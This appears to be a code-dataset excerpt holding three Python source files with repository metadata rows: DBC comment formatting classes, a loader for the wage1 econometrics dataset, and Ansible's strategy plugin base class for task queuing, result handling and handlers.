_fmt = 'CM_ BO_ {frame_id} "{comment}" ;'
def __init__(self, value):
self._message = None
try:
super(MessageComment, self).__init__(value)
except TypeError:
super(MessageComment, self).__init__()
def format(self, *args, **kwargs):
return self._fmt.format(
frame_id=self._message.dbc_frame_id,
comment=self.replace('"', '\\"')
)
@property
def message(self):
return self._message
@message.setter
def message(self, value):
self._message = value
class SignalComment(Comment):
_fmt = 'CM_ SG_ {frame_id} {name} "{comment}";'
def __init__(self, value):
self._signal = None
try:
super(SignalComment, self).__init__(value)
except TypeError:
super(SignalComment, self).__init__()
def format(self, *args, **kwargs):
return self._fmt.format(
frame_id=self._signal.message.dbc_frame_id,
name=self._signal.name,
comment=self.replace('"', '\\"')
)
@property
def signal(self):
return self._signal
@signal.setter
def signal(self, value):
self._signal = value
class EnvironmentVariableComment(Comment):
_fmt = 'CM_ EV_ {name} "{comment}";'
def __init__(self, value):
self._environment_variable = None
try:
super(EnvironmentVariableComment, self).__init__(value)
except TypeError:
super(EnvironmentVariableComment, self).__init__()
def format(self, *args, **kwargs):
return self._fmt.format(
name=self._environment_variable.name,
comment=self.replace('"', '\\"')
)
@property
def environment_variable(self):
return self._environment_variable
@environment_variable.setter
def environment_variable(self, value):
self._environment_variable = value
| 23.99115 | 67 | 0.586868 |
4a1e3906025e5d5a9b26ab847bd9ca06719be68a | 2,239 | py | Python | observations/r/wage1.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 199 | 2017-07-24T01:34:27.000Z | 2022-01-29T00:50:55.000Z | observations/r/wage1.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 46 | 2017-09-05T19:27:20.000Z | 2019-01-07T09:47:26.000Z | observations/r/wage1.py | hajime9652/observations | 2c8b1ac31025938cb17762e540f2f592e302d5de | [
"Apache-2.0"
] | 45 | 2017-07-26T00:10:44.000Z | 2022-03-16T20:44:59.000Z | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import csv
import numpy as np
import os
import sys
from observations.util import maybe_download_and_extract
def wage1(path):
"""wage1
Data loads lazily. Type data(wage1) into the console.
A data.frame with 526 rows and 24 variables:
- wage. average hourly earnings
- educ. years of education
- exper. years potential experience
- tenure. years with current employer
- nonwhite. =1 if nonwhite
- female. =1 if female
- married. =1 if married
- numdep. number of dependents
- smsa. =1 if live in SMSA
- northcen. =1 if live in north central U.S
- south. =1 if live in southern region
- west. =1 if live in western region
- construc. =1 if work in construc. indus.
- ndurman. =1 if in nondur. manuf. indus.
- trcommpu. =1 if in trans, commun, pub ut
- trade. =1 if in wholesale or retail
- services. =1 if in services indus.
- profserv. =1 if in prof. serv. indus.
- profocc. =1 if in profess. occupation
- clerocc. =1 if in clerical occupation
- servocc. =1 if in service occupation
- lwage. log(wage)
- expersq. exper^2
- tenursq. tenure^2
https://www.cengage.com/cgi-wadsworth/course_products_wp.pl?fid=M20b&product_
isbn_issn=9781111531041
Args:
path: str.
Path to directory which either stores file or otherwise file will
be downloaded and extracted there.
Filename is `wage1.csv`.
Returns:
Tuple of np.ndarray `x_train` with 526 rows and 24 columns and
dictionary `metadata` of column headers (feature names).
"""
import pandas as pd
path = os.path.expanduser(path)
filename = 'wage1.csv'
if not os.path.exists(os.path.join(path, filename)):
url = 'http://dustintran.com/data/r/wooldridge/wage1.csv'
maybe_download_and_extract(path, url,
save_file_name='wage1.csv',
resume=False)
data = pd.read_csv(os.path.join(path, filename), index_col=0,
parse_dates=True)
x_train = data.values
metadata = {'columns': data.columns}
return x_train, metadata
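# Example usage (the path below is illustrative):
#   x_train, metadata = wage1('~/data')
#   x_train.shape  # (526, 24)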
| 22.846939 | 77 | 0.669049 |
4a1e39bb30b04c3f1890319344b39508fb54a017 | 56,308 | py | Python | venv/lib/python2.7/site-packages/ansible/plugins/strategy/__init__.py | aburan28/ansible-devops-pipeline | 50aa801632ca0828c16faac55732f1e79085f932 | [
"Apache-2.0"
] | 1 | 2019-04-16T21:23:15.000Z | 2019-04-16T21:23:15.000Z | venv/lib/python2.7/site-packages/ansible/plugins/strategy/__init__.py | aburan28/ansible-devops-pipeline | 50aa801632ca0828c16faac55732f1e79085f932 | [
"Apache-2.0"
] | 5 | 2020-02-26T20:10:50.000Z | 2021-09-23T23:23:18.000Z | venv/lib/python2.7/site-packages/ansible/plugins/strategy/__init__.py | aburan28/ansible-devops-pipeline | 50aa801632ca0828c16faac55732f1e79085f932 | [
"Apache-2.0"
] | null | null | null | # (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import cmd
import functools
import os
import pprint
import sys
import threading
import time
from collections import deque
from multiprocessing import Lock
from jinja2.exceptions import UndefinedError
from ansible import constants as C
from ansible.errors import AnsibleError, AnsibleParserError, AnsibleUndefinedVariable
from ansible.executor import action_write_locks
from ansible.executor.process.worker import WorkerProcess
from ansible.executor.task_result import TaskResult
from ansible.inventory.host import Host
from ansible.module_utils.six.moves import queue as Queue
from ansible.module_utils.six import iteritems, itervalues, string_types
from ansible.module_utils._text import to_text
from ansible.module_utils.connection import Connection, ConnectionError
from ansible.playbook.helpers import load_list_of_blocks
from ansible.playbook.included_file import IncludedFile
from ansible.playbook.task_include import TaskInclude
from ansible.playbook.role_include import IncludeRole
from ansible.plugins.loader import action_loader, connection_loader, filter_loader, lookup_loader, module_loader, test_loader
from ansible.template import Templar
from ansible.utils.vars import combine_vars
from ansible.vars.clean import strip_internal_keys
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
__all__ = ['StrategyBase']
class StrategySentinel:
pass
# TODO: this should probably be in the plugins/__init__.py, with
# a smarter mechanism to set all of the attributes based on
# the loaders created there
class SharedPluginLoaderObj:
'''
A simple object to make pass the various plugin loaders to
the forked processes over the queue easier
'''
def __init__(self):
self.action_loader = action_loader
self.connection_loader = connection_loader
self.filter_loader = filter_loader
self.test_loader = test_loader
self.lookup_loader = lookup_loader
self.module_loader = module_loader
_sentinel = StrategySentinel()
def results_thread_main(strategy):
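    # Background thread: drain results from the final queue into strategy._results
    # until the StrategySentinel arrives or the queue is closed.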
while True:
try:
result = strategy._final_q.get()
if isinstance(result, StrategySentinel):
break
else:
strategy._results_lock.acquire()
strategy._results.append(result)
strategy._results_lock.release()
except (IOError, EOFError):
break
except Queue.Empty:
pass
def debug_closure(func):
"""Closure to wrap ``StrategyBase._process_pending_results`` and invoke the task debugger"""
@functools.wraps(func)
def inner(self, iterator, one_pass=False, max_passes=None):
status_to_stats_map = (
('is_failed', 'failures'),
('is_unreachable', 'dark'),
('is_changed', 'changed'),
('is_skipped', 'skipped'),
)
# We don't know the host yet, copy the previous states, for lookup after we process new results
prev_host_states = iterator._host_states.copy()
results = func(self, iterator, one_pass=one_pass, max_passes=max_passes)
_processed_results = []
for result in results:
task = result._task
host = result._host
_queued_task_args = self._queued_task_cache.pop((host.name, task._uuid), None)
task_vars = _queued_task_args['task_vars']
play_context = _queued_task_args['play_context']
# Try to grab the previous host state, if it doesn't exist use get_host_state to generate an empty state
try:
prev_host_state = prev_host_states[host.name]
except KeyError:
prev_host_state = iterator.get_host_state(host)
while result.needs_debugger(globally_enabled=self.debugger_active):
next_action = NextAction()
dbg = Debugger(task, host, task_vars, play_context, result, next_action)
dbg.cmdloop()
if next_action.result == NextAction.REDO:
# rollback host state
self._tqm.clear_failed_hosts()
iterator._host_states[host.name] = prev_host_state
for method, what in status_to_stats_map:
if getattr(result, method)():
self._tqm._stats.decrement(what, host.name)
self._tqm._stats.decrement('ok', host.name)
# redo
self._queue_task(host, task, task_vars, play_context)
_processed_results.extend(debug_closure(func)(self, iterator, one_pass))
break
elif next_action.result == NextAction.CONTINUE:
_processed_results.append(result)
break
elif next_action.result == NextAction.EXIT:
# Matches KeyboardInterrupt from bin/ansible
sys.exit(99)
else:
_processed_results.append(result)
return _processed_results
return inner
class StrategyBase:
'''
This is the base class for strategy plugins, which contains some common
code useful to all strategies like running handlers, cleanup actions, etc.
'''
def __init__(self, tqm):
self._tqm = tqm
self._inventory = tqm.get_inventory()
self._workers = tqm.get_workers()
self._notified_handlers = tqm._notified_handlers
self._listening_handlers = tqm._listening_handlers
self._variable_manager = tqm.get_variable_manager()
self._loader = tqm.get_loader()
self._final_q = tqm._final_q
self._step = getattr(tqm._options, 'step', False)
self._diff = getattr(tqm._options, 'diff', False)
self.flush_cache = getattr(tqm._options, 'flush_cache', False)
# the task cache is a dictionary of tuples of (host.name, task._uuid)
# used to find the original task object of in-flight tasks and to store
# the task args/vars and play context info used to queue the task.
self._queued_task_cache = {}
# Backwards compat: self._display isn't really needed, just import the global display and use that.
self._display = display
# internal counters
self._pending_results = 0
self._cur_worker = 0
# this dictionary is used to keep track of hosts that have
# outstanding tasks still in queue
self._blocked_hosts = dict()
# this dictionary is used to keep track of hosts that have
# flushed handlers
self._flushed_hosts = dict()
self._results = deque()
self._results_lock = threading.Condition(threading.Lock())
# create the result processing thread for reading results in the background
self._results_thread = threading.Thread(target=results_thread_main, args=(self,))
self._results_thread.daemon = True
self._results_thread.start()
# holds the list of active (persistent) connections to be shutdown at
# play completion
self._active_connections = dict()
self.debugger_active = C.ENABLE_TASK_DEBUGGER
def cleanup(self):
# close active persistent connections
for sock in itervalues(self._active_connections):
try:
conn = Connection(sock)
conn.reset()
except ConnectionError as e:
# most likely socket is already closed
display.debug("got an error while closing persistent connection: %s" % e)
self._final_q.put(_sentinel)
self._results_thread.join()
def run(self, iterator, play_context, result=0):
# execute one more pass through the iterator without peeking, to
# make sure that all of the hosts are advanced to their final task.
# This should be safe, as everything should be ITERATING_COMPLETE by
# this point, though the strategy may not advance the hosts itself.
[iterator.get_next_task_for_host(host) for host in self._inventory.get_hosts(iterator._play.hosts) if host.name not in self._tqm._unreachable_hosts]
# save the failed/unreachable hosts, as the run_handlers()
# method will clear that information during its execution
failed_hosts = iterator.get_failed_hosts()
unreachable_hosts = self._tqm._unreachable_hosts.keys()
display.debug("running handlers")
handler_result = self.run_handlers(iterator, play_context)
if isinstance(handler_result, bool) and not handler_result:
result |= self._tqm.RUN_ERROR
elif not handler_result:
result |= handler_result
# now update with the hosts (if any) that failed or were
# unreachable during the handler execution phase
failed_hosts = set(failed_hosts).union(iterator.get_failed_hosts())
unreachable_hosts = set(unreachable_hosts).union(self._tqm._unreachable_hosts.keys())
# return the appropriate code, depending on the status hosts after the run
if not isinstance(result, bool) and result != self._tqm.RUN_OK:
return result
elif len(unreachable_hosts) > 0:
return self._tqm.RUN_UNREACHABLE_HOSTS
elif len(failed_hosts) > 0:
return self._tqm.RUN_FAILED_HOSTS
else:
return self._tqm.RUN_OK
def get_hosts_remaining(self, play):
return [host for host in self._inventory.get_hosts(play.hosts)
if host.name not in self._tqm._failed_hosts and host.name not in self._tqm._unreachable_hosts]
def get_failed_hosts(self, play):
return [host for host in self._inventory.get_hosts(play.hosts) if host.name in self._tqm._failed_hosts]
def add_tqm_variables(self, vars, play):
'''
Base class method to add extra variables/information to the list of task
vars sent through the executor engine regarding the task queue manager state.
'''
vars['ansible_current_hosts'] = [h.name for h in self.get_hosts_remaining(play)]
vars['ansible_failed_hosts'] = [h.name for h in self.get_failed_hosts(play)]
def _queue_task(self, host, task, task_vars, play_context):
''' handles queueing the task up to be sent to a worker '''
display.debug("entering _queue_task() for %s/%s" % (host.name, task.action))
# Add a write lock for tasks.
# Maybe this should be added somewhere further up the call stack but
# this is the earliest in the code where we have task (1) extracted
# into its own variable and (2) there's only a single code path
# leading to the module being run. This is called by three
# functions: __init__.py::_do_handler_run(), linear.py::run(), and
# free.py::run() so we'd have to add to all three to do it there.
# The next common higher level is __init__.py::run() and that has
# tasks inside of play_iterator so we'd have to extract them to do it
# there.
if task.action not in action_write_locks.action_write_locks:
display.debug('Creating lock for %s' % task.action)
action_write_locks.action_write_locks[task.action] = Lock()
# and then queue the new task
try:
# create a dummy object with plugin loaders set as an easier
# way to share them with the forked processes
shared_loader_obj = SharedPluginLoaderObj()
queued = False
starting_worker = self._cur_worker
while True:
worker_prc = self._workers[self._cur_worker]
if worker_prc is None or not worker_prc.is_alive():
self._queued_task_cache[(host.name, task._uuid)] = {
'host': host,
'task': task,
'task_vars': task_vars,
'play_context': play_context
}
worker_prc = WorkerProcess(self._final_q, task_vars, host, task, play_context, self._loader, self._variable_manager, shared_loader_obj)
self._workers[self._cur_worker] = worker_prc
worker_prc.start()
display.debug("worker is %d (out of %d available)" % (self._cur_worker + 1, len(self._workers)))
queued = True
self._cur_worker += 1
if self._cur_worker >= len(self._workers):
self._cur_worker = 0
if queued:
break
elif self._cur_worker == starting_worker:
time.sleep(0.0001)
self._pending_results += 1
except (EOFError, IOError, AssertionError) as e:
# most likely an abort
display.debug("got an error while queuing: %s" % e)
return
display.debug("exiting _queue_task() for %s/%s" % (host.name, task.action))
def get_task_hosts(self, iterator, task_host, task):
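        # run_once results apply to every reachable host in the play; otherwise
        # only to the host that actually ran the task.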
if task.run_once:
host_list = [host for host in self._inventory.get_hosts(iterator._play.hosts) if host.name not in self._tqm._unreachable_hosts]
else:
host_list = [task_host]
return host_list
def get_delegated_hosts(self, result, task):
host_name = result.get('_ansible_delegated_vars', {}).get('ansible_delegated_host', None)
if host_name is not None:
actual_host = self._inventory.get_host(host_name)
if actual_host is None:
actual_host = Host(name=host_name)
else:
actual_host = Host(name=task.delegate_to)
return [actual_host]
@debug_closure
def _process_pending_results(self, iterator, one_pass=False, max_passes=None):
'''
Reads results off the final queue and takes appropriate action
based on the result (executing callbacks, updating state, etc.).
'''
ret_results = []
def get_original_host(host_name):
# FIXME: this should not need x2 _inventory
host_name = to_text(host_name)
if host_name in self._inventory.hosts:
return self._inventory.hosts[host_name]
else:
return self._inventory.get_host(host_name)
def search_handler_blocks_by_name(handler_name, handler_blocks):
for handler_block in handler_blocks:
for handler_task in handler_block.block:
if handler_task.name:
handler_vars = self._variable_manager.get_vars(play=iterator._play, task=handler_task)
templar = Templar(loader=self._loader, variables=handler_vars)
try:
# first we check with the full result of get_name(), which may
# include the role name (if the handler is from a role). If that
# is not found, we resort to the simple name field, which doesn't
# have anything extra added to it.
target_handler_name = templar.template(handler_task.name)
if target_handler_name == handler_name:
return handler_task
else:
target_handler_name = templar.template(handler_task.get_name())
if target_handler_name == handler_name:
return handler_task
except (UndefinedError, AnsibleUndefinedVariable):
# We skip this handler due to the fact that it may be using
# a variable in the name that was conditionally included via
# set_fact or some other method, and we don't want to error
# out unnecessarily
continue
return None
def search_handler_blocks_by_uuid(handler_uuid, handler_blocks):
for handler_block in handler_blocks:
for handler_task in handler_block.block:
if handler_uuid == handler_task._uuid:
return handler_task
return None
def parent_handler_match(target_handler, handler_name):
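            # Walk up the include/include_role parent chain, templating each
            # parent's name, to see whether the notify refers to an ancestor.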
if target_handler:
if isinstance(target_handler, (TaskInclude, IncludeRole)):
try:
handler_vars = self._variable_manager.get_vars(play=iterator._play, task=target_handler)
templar = Templar(loader=self._loader, variables=handler_vars)
target_handler_name = templar.template(target_handler.name)
if target_handler_name == handler_name:
return True
else:
target_handler_name = templar.template(target_handler.get_name())
if target_handler_name == handler_name:
return True
except (UndefinedError, AnsibleUndefinedVariable):
pass
return parent_handler_match(target_handler._parent, handler_name)
else:
return False
cur_pass = 0
while True:
try:
self._results_lock.acquire()
task_result = self._results.popleft()
except IndexError:
break
finally:
self._results_lock.release()
# get the original host and task. We then assign them to the TaskResult for use in callbacks/etc.
original_host = get_original_host(task_result._host)
queue_cache_entry = (original_host.name, task_result._task)
found_task = self._queued_task_cache.get(queue_cache_entry)['task']
original_task = found_task.copy(exclude_parent=True, exclude_tasks=True)
original_task._parent = found_task._parent
original_task.from_attrs(task_result._task_fields)
task_result._host = original_host
task_result._task = original_task
# send callbacks for 'non final' results
if '_ansible_retry' in task_result._result:
self._tqm.send_callback('v2_runner_retry', task_result)
continue
elif '_ansible_item_result' in task_result._result:
if task_result.is_failed() or task_result.is_unreachable():
self._tqm.send_callback('v2_runner_item_on_failed', task_result)
elif task_result.is_skipped():
self._tqm.send_callback('v2_runner_item_on_skipped', task_result)
else:
if 'diff' in task_result._result:
if self._diff or getattr(original_task, 'diff', False):
self._tqm.send_callback('v2_on_file_diff', task_result)
self._tqm.send_callback('v2_runner_item_on_ok', task_result)
continue
if original_task.register:
host_list = self.get_task_hosts(iterator, original_host, original_task)
clean_copy = strip_internal_keys(task_result._result)
if 'invocation' in clean_copy:
del clean_copy['invocation']
for target_host in host_list:
self._variable_manager.set_nonpersistent_facts(target_host, {original_task.register: clean_copy})
# all host status messages contain 2 entries: (msg, task_result)
role_ran = False
if task_result.is_failed():
role_ran = True
ignore_errors = original_task.ignore_errors
if not ignore_errors:
display.debug("marking %s as failed" % original_host.name)
if original_task.run_once:
# if we're using run_once, we have to fail every host here
for h in self._inventory.get_hosts(iterator._play.hosts):
if h.name not in self._tqm._unreachable_hosts:
state, _ = iterator.get_next_task_for_host(h, peek=True)
iterator.mark_host_failed(h)
state, new_task = iterator.get_next_task_for_host(h, peek=True)
else:
iterator.mark_host_failed(original_host)
# increment the failed count for this host
self._tqm._stats.increment('failures', original_host.name)
# grab the current state and if we're iterating on the rescue portion
# of a block then we save the failed task in a special var for use
# within the rescue/always
state, _ = iterator.get_next_task_for_host(original_host, peek=True)
if iterator.is_failed(original_host) and state and state.run_state == iterator.ITERATING_COMPLETE:
self._tqm._failed_hosts[original_host.name] = True
if state and iterator.get_active_state(state).run_state == iterator.ITERATING_RESCUE:
self._variable_manager.set_nonpersistent_facts(
original_host,
dict(
ansible_failed_task=original_task.serialize(),
ansible_failed_result=task_result._result,
),
)
else:
self._tqm._stats.increment('ok', original_host.name)
if 'changed' in task_result._result and task_result._result['changed']:
self._tqm._stats.increment('changed', original_host.name)
self._tqm.send_callback('v2_runner_on_failed', task_result, ignore_errors=ignore_errors)
elif task_result.is_unreachable():
ignore_unreachable = original_task.ignore_unreachable
if not ignore_unreachable:
self._tqm._unreachable_hosts[original_host.name] = True
iterator._play._removed_hosts.append(original_host.name)
else:
self._tqm._stats.increment('skipped', original_host.name)
task_result._result['skip_reason'] = 'Host %s is unreachable' % original_host.name
self._tqm._stats.increment('dark', original_host.name)
self._tqm.send_callback('v2_runner_on_unreachable', task_result)
elif task_result.is_skipped():
self._tqm._stats.increment('skipped', original_host.name)
self._tqm.send_callback('v2_runner_on_skipped', task_result)
else:
role_ran = True
if original_task.loop:
# this task had a loop, and has more than one result, so
# loop over all of them instead of a single result
result_items = task_result._result.get('results', [])
else:
result_items = [task_result._result]
for result_item in result_items:
if '_ansible_notify' in result_item:
if task_result.is_changed():
# The shared dictionary for notified handlers is a proxy, which
# does not detect when sub-objects within the proxy are modified.
# So, per the docs, we reassign the list so the proxy picks up and
# notifies all other threads
for handler_name in result_item['_ansible_notify']:
found = False
# Find the handler using the above helper. First we look up the
# dependency chain of the current task (if it's from a role), otherwise
# we just look through the list of handlers in the current play/all
# roles and use the first one that matches the notify name
target_handler = search_handler_blocks_by_name(handler_name, iterator._play.handlers)
if target_handler is not None:
found = True
if target_handler._uuid not in self._notified_handlers:
self._notified_handlers[target_handler._uuid] = []
if original_host not in self._notified_handlers[target_handler._uuid]:
self._notified_handlers[target_handler._uuid].append(original_host)
self._tqm.send_callback('v2_playbook_on_notify', target_handler, original_host)
else:
# As there may be more than one handler with the notified name as the
# parent, so we just keep track of whether or not we found one at all
for target_handler_uuid in self._notified_handlers:
target_handler = search_handler_blocks_by_uuid(target_handler_uuid, iterator._play.handlers)
if target_handler and parent_handler_match(target_handler, handler_name):
found = True
if original_host not in self._notified_handlers[target_handler._uuid]:
self._notified_handlers[target_handler._uuid].append(original_host)
self._tqm.send_callback('v2_playbook_on_notify', target_handler, original_host)
if handler_name in self._listening_handlers:
for listening_handler_uuid in self._listening_handlers[handler_name]:
listening_handler = search_handler_blocks_by_uuid(listening_handler_uuid, iterator._play.handlers)
if listening_handler is not None:
found = True
else:
continue
if original_host not in self._notified_handlers[listening_handler._uuid]:
self._notified_handlers[listening_handler._uuid].append(original_host)
self._tqm.send_callback('v2_playbook_on_notify', listening_handler, original_host)
# and if none were found, then we raise an error
if not found:
msg = ("The requested handler '%s' was not found in either the main handlers list or the listening "
"handlers list" % handler_name)
if C.ERROR_ON_MISSING_HANDLER:
raise AnsibleError(msg)
else:
display.warning(msg)
if 'add_host' in result_item:
# this task added a new host (add_host module)
new_host_info = result_item.get('add_host', dict())
self._add_host(new_host_info, iterator)
elif 'add_group' in result_item:
# this task added a new group (group_by module)
self._add_group(original_host, result_item)
if 'ansible_facts' in result_item:
# if delegated fact and we are delegating facts, we need to change target host for them
if original_task.delegate_to is not None and original_task.delegate_facts:
host_list = self.get_delegated_hosts(result_item, original_task)
else:
host_list = self.get_task_hosts(iterator, original_host, original_task)
if original_task.action == 'include_vars':
for (var_name, var_value) in iteritems(result_item['ansible_facts']):
# find the host we're actually referring to here, which may
# be a host that is not really in inventory at all
for target_host in host_list:
self._variable_manager.set_host_variable(target_host, var_name, var_value)
else:
cacheable = result_item.pop('_ansible_facts_cacheable', False)
for target_host in host_list:
if not original_task.action == 'set_fact' or cacheable:
self._variable_manager.set_host_facts(target_host, result_item['ansible_facts'].copy())
if original_task.action == 'set_fact':
self._variable_manager.set_nonpersistent_facts(target_host, result_item['ansible_facts'].copy())
if 'ansible_stats' in result_item and 'data' in result_item['ansible_stats'] and result_item['ansible_stats']['data']:
if 'per_host' not in result_item['ansible_stats'] or result_item['ansible_stats']['per_host']:
host_list = self.get_task_hosts(iterator, original_host, original_task)
else:
host_list = [None]
data = result_item['ansible_stats']['data']
aggregate = 'aggregate' in result_item['ansible_stats'] and result_item['ansible_stats']['aggregate']
for myhost in host_list:
for k in data.keys():
if aggregate:
self._tqm._stats.update_custom_stats(k, data[k], myhost)
else:
self._tqm._stats.set_custom_stats(k, data[k], myhost)
if 'diff' in task_result._result:
if self._diff or getattr(original_task, 'diff', False):
self._tqm.send_callback('v2_on_file_diff', task_result)
if not isinstance(original_task, TaskInclude):
self._tqm._stats.increment('ok', original_host.name)
if 'changed' in task_result._result and task_result._result['changed']:
self._tqm._stats.increment('changed', original_host.name)
# finally, send the ok for this task
self._tqm.send_callback('v2_runner_on_ok', task_result)
self._pending_results -= 1
if original_host.name in self._blocked_hosts:
del self._blocked_hosts[original_host.name]
# If this is a role task, mark the parent role as being run (if
# the task was ok or failed, but not skipped or unreachable)
if original_task._role is not None and role_ran: # TODO: and original_task.action != 'include_role':?
# lookup the role in the ROLE_CACHE to make sure we're dealing
# with the correct object and mark it as executed
for (entry, role_obj) in iteritems(iterator._play.ROLE_CACHE[original_task._role._role_name]):
if role_obj._uuid == original_task._role._uuid:
role_obj._had_task_run[original_host.name] = True
ret_results.append(task_result)
if one_pass or max_passes is not None and (cur_pass + 1) >= max_passes:
break
cur_pass += 1
return ret_results
def _wait_on_handler_results(self, iterator, handler, notified_hosts):
'''
Wait for the handler tasks to complete, using a short sleep
between checks to ensure we don't spin lock
'''
ret_results = []
handler_results = 0
display.debug("waiting for handler results...")
while (self._pending_results > 0 and
handler_results < len(notified_hosts) and
not self._tqm._terminated):
if self._tqm.has_dead_workers():
raise AnsibleError("A worker was found in a dead state")
results = self._process_pending_results(iterator)
ret_results.extend(results)
handler_results += len([
r._host for r in results if r._host in notified_hosts and
r.task_name == handler.name])
if self._pending_results > 0:
time.sleep(C.DEFAULT_INTERNAL_POLL_INTERVAL)
display.debug("no more pending handlers, returning what we have")
return ret_results
def _wait_on_pending_results(self, iterator):
'''
Wait for the shared counter to drop to zero, using a short sleep
between checks to ensure we don't spin lock
'''
ret_results = []
display.debug("waiting for pending results...")
while self._pending_results > 0 and not self._tqm._terminated:
if self._tqm.has_dead_workers():
raise AnsibleError("A worker was found in a dead state")
results = self._process_pending_results(iterator)
ret_results.extend(results)
if self._pending_results > 0:
time.sleep(C.DEFAULT_INTERNAL_POLL_INTERVAL)
display.debug("no more pending results, returning what we have")
return ret_results
def _add_host(self, host_info, iterator):
'''
Helper function to add a new host to inventory based on a task result.
'''
if host_info:
host_name = host_info.get('host_name')
# Check if host in inventory, add if not
if host_name not in self._inventory.hosts:
self._inventory.add_host(host_name, 'all')
new_host = self._inventory.hosts.get(host_name)
# Set/update the vars for this host
new_host.vars = combine_vars(new_host.get_vars(), host_info.get('host_vars', dict()))
new_groups = host_info.get('groups', [])
for group_name in new_groups:
if group_name not in self._inventory.groups:
self._inventory.add_group(group_name)
new_group = self._inventory.groups[group_name]
new_group.add_host(self._inventory.hosts[host_name])
# reconcile inventory, ensures inventory rules are followed
self._inventory.reconcile_inventory()
def _add_group(self, host, result_item):
'''
Helper function to add a group (if it does not exist), and to assign the
specified host to that group.
'''
changed = False
# the host here is from the executor side, which means it was a
# serialized/cloned copy and we'll need to look up the proper
# host object from the master inventory
real_host = self._inventory.hosts.get(host.name)
if real_host is None:
if host.name == self._inventory.localhost.name:
real_host = self._inventory.localhost
else:
raise AnsibleError('%s cannot be matched in inventory' % host.name)
group_name = result_item.get('add_group')
parent_group_names = result_item.get('parent_groups', [])
for name in [group_name] + parent_group_names:
if name not in self._inventory.groups:
# create the new group and add it to inventory
self._inventory.add_group(name)
changed = True
group = self._inventory.groups[group_name]
for parent_group_name in parent_group_names:
parent_group = self._inventory.groups[parent_group_name]
parent_group.add_child_group(group)
if real_host.name not in group.get_hosts():
group.add_host(real_host)
changed = True
if group_name not in host.get_groups():
real_host.add_group(group)
changed = True
if changed:
self._inventory.reconcile_inventory()
return changed
def _copy_included_file(self, included_file):
'''
A proven safe and performant way to create a copy of an included file
'''
ti_copy = included_file._task.copy(exclude_parent=True)
ti_copy._parent = included_file._task._parent
temp_vars = ti_copy.vars.copy()
temp_vars.update(included_file._args)
ti_copy.vars = temp_vars
return ti_copy
def _load_included_file(self, included_file, iterator, is_handler=False):
'''
Loads an included YAML file of tasks, applying the optional set of variables.
'''
display.debug("loading included file: %s" % included_file._filename)
try:
data = self._loader.load_from_file(included_file._filename)
if data is None:
return []
elif not isinstance(data, list):
raise AnsibleError("included task files must contain a list of tasks")
ti_copy = self._copy_included_file(included_file)
# pop tags out of the include args, if they were specified there, and assign
# them to the include. If the include already had tags specified, we raise an
# error so that users know not to specify them both ways
tags = included_file._task.vars.pop('tags', [])
if isinstance(tags, string_types):
tags = tags.split(',')
if len(tags) > 0:
if len(included_file._task.tags) > 0:
raise AnsibleParserError("Include tasks should not specify tags in more than one way (both via args and directly on the task). "
"Mixing tag specify styles is prohibited for whole import hierarchy, not only for single import statement",
obj=included_file._task._ds)
display.deprecated("You should not specify tags in the include parameters. All tags should be specified using the task-level option",
version='2.12')
included_file._task.tags = tags
block_list = load_list_of_blocks(
data,
play=iterator._play,
parent_block=ti_copy.build_parent_block(),
role=included_file._task._role,
use_handlers=is_handler,
loader=self._loader,
variable_manager=self._variable_manager,
)
# since we skip incrementing the stats when the task result is
# first processed, we do so now for each host in the list
for host in included_file._hosts:
self._tqm._stats.increment('ok', host.name)
except AnsibleError as e:
# mark all of the hosts including this file as failed, send callbacks,
# and increment the stats for this host
for host in included_file._hosts:
tr = TaskResult(host=host, task=included_file._task, return_data=dict(failed=True, reason=to_text(e)))
iterator.mark_host_failed(host)
self._tqm._failed_hosts[host.name] = True
self._tqm._stats.increment('failures', host.name)
self._tqm.send_callback('v2_runner_on_failed', tr)
return []
# finally, send the callback and return the list of blocks loaded
self._tqm.send_callback('v2_playbook_on_include', included_file)
display.debug("done processing included file")
return block_list
def run_handlers(self, iterator, play_context):
'''
Runs handlers on those hosts which have been notified.
'''
result = self._tqm.RUN_OK
for handler_block in iterator._play.handlers:
# FIXME: handlers need to support the rescue/always portions of blocks too,
# but this may take some work in the iterator and gets tricky when
# we consider the ability of meta tasks to flush handlers
for handler in handler_block.block:
if handler._uuid in self._notified_handlers and len(self._notified_handlers[handler._uuid]):
handler_vars = self._variable_manager.get_vars(play=iterator._play, task=handler)
templar = Templar(loader=self._loader, variables=handler_vars)
handler_name = handler.get_name()
try:
handler_name = templar.template(handler_name)
except (UndefinedError, AnsibleUndefinedVariable):
pass
result = self._do_handler_run(handler, handler_name, iterator=iterator, play_context=play_context)
if not result:
break
return result
def _do_handler_run(self, handler, handler_name, iterator, play_context, notified_hosts=None):
# FIXME: need to use iterator.get_failed_hosts() instead?
# if not len(self.get_hosts_remaining(iterator._play)):
# self._tqm.send_callback('v2_playbook_on_no_hosts_remaining')
# result = False
# break
if notified_hosts is None:
notified_hosts = self._notified_handlers[handler._uuid]
notified_hosts = self._filter_notified_hosts(notified_hosts)
if len(notified_hosts) > 0:
saved_name = handler.name
handler.name = handler_name
self._tqm.send_callback('v2_playbook_on_handler_task_start', handler)
handler.name = saved_name
run_once = False
try:
action = action_loader.get(handler.action, class_only=True)
if handler.run_once or getattr(action, 'BYPASS_HOST_LOOP', False):
run_once = True
except KeyError:
# we don't care here, because the action may simply not have a
# corresponding action plugin
pass
host_results = []
for host in notified_hosts:
if not handler.has_triggered(host) and (not iterator.is_failed(host) or play_context.force_handlers):
task_vars = self._variable_manager.get_vars(play=iterator._play, host=host, task=handler)
self.add_tqm_variables(task_vars, play=iterator._play)
self._queue_task(host, handler, task_vars, play_context)
